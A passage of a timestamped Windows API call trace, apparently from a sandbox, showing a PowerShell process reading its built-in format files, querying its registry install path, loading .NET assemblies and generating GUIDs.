	[0498.832] CoTaskMemFree (pv=0x1b8371f0) 
	[0498.832] RegCloseKey (hKey=0x2f8) returned 0x0
	[0498.832] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0498.832] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ace60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0498.833] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0x19582e44, Data2=0x6ac4, Data3=0x4d13, Data4=([0]=0xa4, [1]=0xf3, [2]=0x5f, [3]=0x3, [4]=0x73, [5]=0xa1, [6]=0xf, [7]=0x4a))) returned 0x0
	[0498.838] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0x70173e5f, Data2=0x5fac, Data3=0x4964, Data4=([0]=0x88, [1]=0xdf, [2]=0x6d, [3]=0x6b, [4]=0xd2, [5]=0x4a, [6]=0xfe, [7]=0x98))) returned 0x0
	[0498.839] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0xaadddbe2, Data2=0x69f7, Data3=0x4bb3, Data4=([0]=0x92, [1]=0x2a, [2]=0x53, [3]=0x32, [4]=0xdc, [5]=0x7c, [6]=0x5a, [7]=0xdc))) returned 0x0
	[0498.839] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0xaad20589, Data2=0x8db6, Data3=0x40b4, Data4=([0]=0x90, [1]=0x65, [2]=0xbb, [3]=0xe2, [4]=0xd0, [5]=0x58, [6]=0x65, [7]=0x91))) returned 0x0
	[0498.840] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0x1b9be377, Data2=0xb3dd, Data3=0x4eee, Data4=([0]=0xa1, [1]=0x9e, [2]=0x28, [3]=0xab, [4]=0x78, [5]=0xc, [6]=0x7, [7]=0xae))) returned 0x0
	[0498.840] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0x37567798, Data2=0xcd1d, Data3=0x4309, Data4=([0]=0xbc, [1]=0xc1, [2]=0xba, [3]=0x6a, [4]=0xda, [5]=0x3f, [6]=0x42, [7]=0xff))) returned 0x0
	[0498.841] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0498.841] SetErrorMode (uMode=0x1) returned 0x1
	[0498.841] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f8
	[0498.841] GetFileType (hFile=0x2f8) returned 0x1
	[0498.842] SetErrorMode (uMode=0x1) returned 0x1
	[0498.842] GetFileType (hFile=0x2f8) returned 0x1
	[0498.842] ReadFile (in: hFile=0x2f8, lpBuffer=0x34c09e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x34c09e0*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0498.843] ReadFile (in: hFile=0x2f8, lpBuffer=0x34c09e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x34c09e0*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0498.843] ReadFile (in: hFile=0x2f8, lpBuffer=0x34c09e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x34c09e0*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0498.843] ReadFile (in: hFile=0x2f8, lpBuffer=0x34c09e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x34c09e0*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0498.844] ReadFile (in: hFile=0x2f8, lpBuffer=0x34c09e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x34c09e0*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0498.844] ReadFile (in: hFile=0x2f8, lpBuffer=0x34c09e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x34c09e0*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0498.844] ReadFile (in: hFile=0x2f8, lpBuffer=0x34c09e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x34c09e0*, lpNumberOfBytesRead=0x1ad2d8*=0xaca, lpOverlapped=0x0) returned 1
	[0498.845] ReadFile (in: hFile=0x2f8, lpBuffer=0x34c0012, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x34c0012*, lpNumberOfBytesRead=0x1ad2d8*=0x0, lpOverlapped=0x0) returned 1
	[0498.845] ReadFile (in: hFile=0x2f8, lpBuffer=0x34c09e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x34c09e0*, lpNumberOfBytesRead=0x1ad2d8*=0x0, lpOverlapped=0x0) returned 1
	[0498.845] CloseHandle (hObject=0x2f8) returned 1
	[0498.845] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ad020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0498.845] SetErrorMode (uMode=0x1) returned 0x1
	[0498.845] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad280 | out: lpFileInformation=0x1ad280*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0498.845] SetErrorMode (uMode=0x1) returned 0x1
	[0498.845] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0498.846] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad368 | out: phkResult=0x1ad368*=0x2f8) returned 0x0
	[0498.846] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad2ec, lpData=0x0, lpcbData=0x1ad2e8*=0x0 | out: lpType=0x1ad2ec*=0x1, lpData=0x0, lpcbData=0x1ad2e8*=0x56) returned 0x0
	[0498.846] CoTaskMemAlloc (cb=0x5a) returned 0x1b8371f0
	[0498.846] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad2bc, lpData=0x1b8371f0, lpcbData=0x1ad2b8*=0x56 | out: lpType=0x1ad2bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ad2b8*=0x56) returned 0x0
	[0498.846] CoTaskMemFree (pv=0x1b8371f0) 
	[0498.846] RegCloseKey (hKey=0x2f8) returned 0x0
	[0498.846] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0498.846] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ace60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0498.850] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x1ac7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0498.852] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ac7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0498.940] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x1ac7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0498.945] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0498.947] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1ac7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0498.948] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0x1ac7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52
	[0498.950] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0x1ac7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74
	[0499.620] VirtualQuery (in: lpAddress=0x1abe00, lpBuffer=0x1accc0, dwLength=0x30 | out: lpBuffer=0x1accc0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0499.621] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0x139dd57d, Data2=0x67b3, Data3=0x4712, Data4=([0]=0xa2, [1]=0x15, [2]=0xe7, [3]=0xbe, [4]=0x19, [5]=0x4a, [6]=0xa5, [7]=0x14))) returned 0x0
	[0499.622] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0x301de797, Data2=0xb08e, Data3=0x45ea, Data4=([0]=0xa8, [1]=0x3a, [2]=0xfc, [3]=0x44, [4]=0x55, [5]=0xb5, [6]=0x58, [7]=0x44))) returned 0x0
	[0499.623] VirtualQuery (in: lpAddress=0x1abfb0, lpBuffer=0x1ace70, dwLength=0x30 | out: lpBuffer=0x1ace70*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0499.624] VirtualQuery (in: lpAddress=0x1abfb0, lpBuffer=0x1ace70, dwLength=0x30 | out: lpBuffer=0x1ace70*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0500.249] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0xea243426, Data2=0xc122, Data3=0x4274, Data4=([0]=0x95, [1]=0xe7, [2]=0xef, [3]=0x74, [4]=0xbc, [5]=0x3b, [6]=0x0, [7]=0x29))) returned 0x0
	[0500.252] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0x1c010b90, Data2=0xe84c, Data3=0x44cb, Data4=([0]=0xa4, [1]=0xb0, [2]=0x3c, [3]=0x4a, [4]=0x3, [5]=0x83, [6]=0xb3, [7]=0x4c))) returned 0x0
	[0500.253] VirtualQuery (in: lpAddress=0x1ac200, lpBuffer=0x1ad0c0, dwLength=0x30 | out: lpBuffer=0x1ad0c0*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0500.253] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0x3b898e91, Data2=0x6082, Data3=0x402d, Data4=([0]=0x99, [1]=0x90, [2]=0x90, [3]=0xe1, [4]=0x64, [5]=0x2e, [6]=0xca, [7]=0x81))) returned 0x0
	[0500.267] VirtualQuery (in: lpAddress=0x1ab870, lpBuffer=0x1ac730, dwLength=0x30 | out: lpBuffer=0x1ac730*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0500.267] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0xbab749eb, Data2=0x408a, Data3=0x4754, Data4=([0]=0x8a, [1]=0x81, [2]=0xa8, [3]=0xfe, [4]=0xb0, [5]=0xef, [6]=0x77, [7]=0x46))) returned 0x0
	[0500.267] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0x29da33db, Data2=0xb3dc, Data3=0x40eb, Data4=([0]=0xa7, [1]=0x43, [2]=0x50, [3]=0xcc, [4]=0xf8, [5]=0x33, [6]=0x75, [7]=0xa5))) returned 0x0
	[0500.267] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x320
	[0500.267] GetFileType (hFile=0x320) returned 0x1
	[0500.267] SetErrorMode (uMode=0x1) returned 0x1
	[0500.268] GetFileType (hFile=0x320) returned 0x1
	[0500.268] ReadFile (in: hFile=0x320, lpBuffer=0x2e2e520, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2e2e520*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0500.269] ReadFile (in: hFile=0x320, lpBuffer=0x2e2e520, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2e2e520*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0500.269] ReadFile (in: hFile=0x320, lpBuffer=0x2e2e520, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2e2e520*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0500.269] ReadFile (in: hFile=0x320, lpBuffer=0x2e2e520, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2e2e520*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0500.269] ReadFile (in: hFile=0x320, lpBuffer=0x2e2e520, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2e2e520*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0500.269] ReadFile (in: hFile=0x320, lpBuffer=0x2e2e520, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2e2e520*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0500.269] ReadFile (in: hFile=0x320, lpBuffer=0x2e2e520, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2e2e520*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0500.270] ReadFile (in: hFile=0x320, lpBuffer=0x2e2e520, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2e2e520*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0500.270] ReadFile (in: hFile=0x320, lpBuffer=0x2e2e520, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2e2e520*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0500.271] ReadFile (in: hFile=0x320, lpBuffer=0x2e2e520, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2e2e520*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0500.271] ReadFile (in: hFile=0x320, lpBuffer=0x2e2e520, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2e2e520*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0500.271] ReadFile (in: hFile=0x320, lpBuffer=0x2e2e520, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2e2e520*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0500.271] ReadFile (in: hFile=0x320, lpBuffer=0x2e2e520, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2e2e520*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0500.272] ReadFile (in: hFile=0x320, lpBuffer=0x2e2e520, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2e2e520*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0500.272] ReadFile (in: hFile=0x320, lpBuffer=0x2e2e520, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2e2e520*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0500.272] ReadFile (in: hFile=0x320, lpBuffer=0x2e2e520, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2e2e520*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0500.273] ReadFile (in: hFile=0x320, lpBuffer=0x2e2e520, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2e2e520*, lpNumberOfBytesRead=0x1ad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0500.274] ReadFile (in: hFile=0x320, lpBuffer=0x2e2e520, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2e2e520*, lpNumberOfBytesRead=0x1ad2d8*=0xbce, lpOverlapped=0x0) returned 1
	[0500.274] ReadFile (in: hFile=0x320, lpBuffer=0x2e2dc56, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2e2dc56*, lpNumberOfBytesRead=0x1ad2d8*=0x0, lpOverlapped=0x0) returned 1
	[0500.274] ReadFile (in: hFile=0x320, lpBuffer=0x2e2e520, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad2d8, lpOverlapped=0x0 | out: lpBuffer=0x2e2e520*, lpNumberOfBytesRead=0x1ad2d8*=0x0, lpOverlapped=0x0) returned 1
	[0500.274] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad368 | out: phkResult=0x1ad368*=0x320) returned 0x0
	[0500.274] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad2ec, lpData=0x0, lpcbData=0x1ad2e8*=0x0 | out: lpType=0x1ad2ec*=0x1, lpData=0x0, lpcbData=0x1ad2e8*=0x56) returned 0x0
	[0500.274] CoTaskMemAlloc (cb=0x5a) returned 0x4541e0
	[0500.274] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad2bc, lpData=0x4541e0, lpcbData=0x1ad2b8*=0x56 | out: lpType=0x1ad2bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ad2b8*=0x56) returned 0x0
	[0500.275] CoTaskMemFree (pv=0x4541e0) 
	[0500.275] RegCloseKey (hKey=0x320) returned 0x0
	[0500.275] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0500.275] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ace60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0500.276] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0x4f9d1526, Data2=0xb63d, Data3=0x44d7, Data4=([0]=0xa2, [1]=0x55, [2]=0x5b, [3]=0x4e, [4]=0x32, [5]=0xa7, [6]=0x7a, [7]=0xf2))) returned 0x0
	[0500.276] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0xe6fcd3f1, Data2=0x1f56, Data3=0x414e, Data4=([0]=0x91, [1]=0xc8, [2]=0x36, [3]=0x6, [4]=0x40, [5]=0x64, [6]=0xd7, [7]=0xbc))) returned 0x0
	[0500.276] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0xf5bc6906, Data2=0x61c1, Data3=0x4d93, Data4=([0]=0xb1, [1]=0x9e, [2]=0xb7, [3]=0x84, [4]=0xea, [5]=0x18, [6]=0xa2, [7]=0xfa))) returned 0x0
	[0500.276] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0x963f4f5f, Data2=0x2e4, Data3=0x45f9, Data4=([0]=0x9a, [1]=0x7c, [2]=0xc1, [3]=0x16, [4]=0x54, [5]=0x59, [6]=0xa1, [7]=0x8e))) returned 0x0
	[0500.277] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0x9b764814, Data2=0xc8f5, Data3=0x4e1b, Data4=([0]=0xa8, [1]=0x9f, [2]=0x4a, [3]=0xd4, [4]=0x1a, [5]=0x57, [6]=0xab, [7]=0x84))) returned 0x0
	[0500.277] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0x7f1c0caf, Data2=0x6c03, Data3=0x4998, Data4=([0]=0x82, [1]=0xd, [2]=0xd, [3]=0xf1, [4]=0xf2, [5]=0x11, [6]=0xbc, [7]=0x4d))) returned 0x0
	[0500.277] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0x8a93bda8, Data2=0x9a5a, Data3=0x42a5, Data4=([0]=0xab, [1]=0xfa, [2]=0x68, [3]=0x51, [4]=0x53, [5]=0xed, [6]=0x8c, [7]=0x17))) returned 0x0
	[0500.277] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0x72074097, Data2=0x3621, Data3=0x4662, Data4=([0]=0x8a, [1]=0xe8, [2]=0x3a, [3]=0x1e, [4]=0x84, [5]=0x79, [6]=0xc5, [7]=0x96))) returned 0x0
	[0500.277] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0x3b99e0e0, Data2=0xc29a, Data3=0x4ce0, Data4=([0]=0x8d, [1]=0x80, [2]=0xa2, [3]=0xd0, [4]=0x99, [5]=0x72, [6]=0x55, [7]=0x79))) returned 0x0
	[0500.277] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0x80efe59d, Data2=0xc49c, Data3=0x4b33, Data4=([0]=0x9d, [1]=0x5c, [2]=0xb7, [3]=0xdf, [4]=0x5e, [5]=0x5e, [6]=0x8c, [7]=0x68))) returned 0x0
	[0500.277] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0xc8450de9, Data2=0xa61e, Data3=0x493c, Data4=([0]=0xb4, [1]=0x19, [2]=0x5, [3]=0x9b, [4]=0x7e, [5]=0xe7, [6]=0x4f, [7]=0x0))) returned 0x0
	[0500.278] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0x241fb7b7, Data2=0xc544, Data3=0x4f18, Data4=([0]=0xad, [1]=0x67, [2]=0x63, [3]=0xb7, [4]=0x43, [5]=0x26, [6]=0xf3, [7]=0x9b))) returned 0x0
	[0500.278] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0x8a01a41a, Data2=0x8f67, Data3=0x4f78, Data4=([0]=0x96, [1]=0x15, [2]=0x99, [3]=0xfc, [4]=0x56, [5]=0xe4, [6]=0x59, [7]=0xd6))) returned 0x0
	[0500.278] CoCreateGuid (in: pguid=0x1ad590 | out: pguid=0x1ad590*(Data1=0xddedbc89, Data2=0xa08, Data3=0x4aad, Data4=([0]=0xb2, [1]=0xd8, [2]=0x1d, [3]=0xd5, [4]=0x97, [5]=0xa5, [6]=0xdb, [7]=0x5c))) returned 0x0
